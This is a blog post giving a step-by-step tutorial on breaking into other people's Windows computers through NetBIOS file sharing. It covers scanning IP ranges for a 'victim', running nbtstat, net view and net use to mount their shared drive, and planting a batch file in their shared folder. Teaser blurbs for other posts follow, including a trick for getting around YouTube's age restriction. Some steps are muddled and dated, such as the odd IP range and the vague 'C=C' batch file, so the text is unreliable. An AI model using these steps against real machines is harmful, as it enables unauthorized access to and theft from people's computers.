Skip to main content

Hack Into A Computer using Internet – Netbios Hacking

Netbios Hacking is the art of hacking into someone else’s computer through your computer. NetBIOS stands for “Network Basic Input Output System.” It is a way for a LAN or WAN to share folders, files, drives, and printers.
In this post i will tell you to hack into a computer with netbios hacking .Netbios hacking is theeasiest way to Hack into a remote computer.


 first download Angry ip scanner

Procedure for Netbios hacking

So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Andry Ip scanner ..




Now Know Your Ip by Clicking Here

Example You Ip is 101.222.222.222

Then Select ip range 101.222.222.222 to 102.222.222.222



 Only Use IP with BLUE DOTS



Step 1
First of all,get a good IP scanner angry ip scanner is a good one you can get it here:
Angry ip scanner Download

Step 2
Now click on start and then goto run and then type there "CMD" and press ok

 This is what you see:
c:\windows>

Now this is what you have to do ---->>>

Replace 255.255.255.255 with the victims IP address., i have wrote another article on How to trace
an ip address of the victims computer

c:\windows>nbtstat -a 255.255.255.255

If you see this your in NetBIOS Remote Machine Name Table

Name Type Status ---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------

If you don't get the number <20>.
The victim disabled the File And Printer Sharing, find  another victim.

Step 3:

Type down:

c:\windows>net view \\255.255.255.255

If the output is like this:

Shared resources at \\255.255.255.255
ComputerNameGoesHere

Sharename Type Used as Comment

------------------------------------------------------------
CDISK Disk xxxxx xxxxx

The command completed successfully.

"DISK" shows that the victim is sharing a Disk named as CDISK

Step 4

you can replace x: by any letter you want but not the letter of your own drive.

CDISK is the name of the shared harddrive.

Now type:
c:\windows>net use x: \\255.255.255.255\CDISK

If the command is successful you are a small time hacker.

Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:.


Note to newbies: This hack will only work if you have the ip of someone on your network. It will not work if the ip of the person you want to "hack" is not on your network.

Tip: If you can only access your targets shared folder put a batch file in their shared folder with the command C=C if they open it,it will share their hardrive.




Congratulations! You’ have hacked into the victims computer
Commands used in this tutorial:
PING
NBTSTAT -a (IP Address of Target)
NET VIEW \\(IP Address of Target)
NET USE K: \\(IP Address of Target)\(SHARENAME)

Comments

Popular posts from this blog

How To Create Your Own Operating System

                               Today in this post i am going to show you how to make Your Own OPERATING SYSTEM Online. No Coding knowledge, No Technical skills required. Nowdays we are using lots of operating systems like Windows, Mac, Linux etc Have you ever thought how this Operating systems are made  ? Ever thought to make your own operating system if yes then today you are going to learn how to make your own customized operating system. The operating system which you will be creating will be a LINUX based Operating system. There is no technical skills required for creating an own Linux Operating System online. Linux is a kernel, which can be used to create Operating System. Operating Systems created by using Linux kernel are called Linux Operating Systems.  Operating Systems like Ubuntu and SUSE are  example of Linux operating systems. To create your own Operating System you don...

How To Unlist Your Number From TrueCaller App

TrueCaller is a mobile app using which you can get details of a mobile contact number by just searching for it. TrueCaller App syncronizes the mobile contact numbers of all the mobiles on which TrueCaller App is linked on to their database and thus provide those info to their app users. So the people who only know the mobile number but dont know the name they can easily find out the contact name of that number using TrueCaller App but still this App is known for not maintaing the   privacy as some people dont want their contact info to be shared online and thus want to Unlist or remove their contact info from the TrueCaller App database. once you remove your mobile number from TrueCaller database it cannot be added after then. so today i will tell you a method to Unlist your mobile number from TrueCaller database or app. the TrueCaller company has provided a official method to remove the mobile numbers of the people who dont want to show it. follow the steps given below to...

How To Watch 18+ Adult Videos on YouTube Without Logging In

Youtube is the most popular video streaming website. YouTube has thousands of streaming videos on nearly every topic. Which are  free to watch.Certain videos that contain nudity, explicit, or violence content are put under 18+ categor y and you can’t watch these videos on YouTube unless you are logged into your YouTube / Google account .In this post I will show you a simple hack on how to see those videos The following message appears while you try to watch 18+ Video, “This content may contain material flagged by YouTube’s user community that may be inappropriate for some users.” “To view this video or group, please verify you are 18 or older by signing in or signing up. If you would instead prefer to avoid potentially inappropriate content, consider activating YouTube’s Safety Mode.” Watch 18+ Videos Without Youtube Account or Loggin in Here is a simple hack for seeing those videos, Just replace “watch” in the YouTube URL with “watch_popup” and the 18+ video ...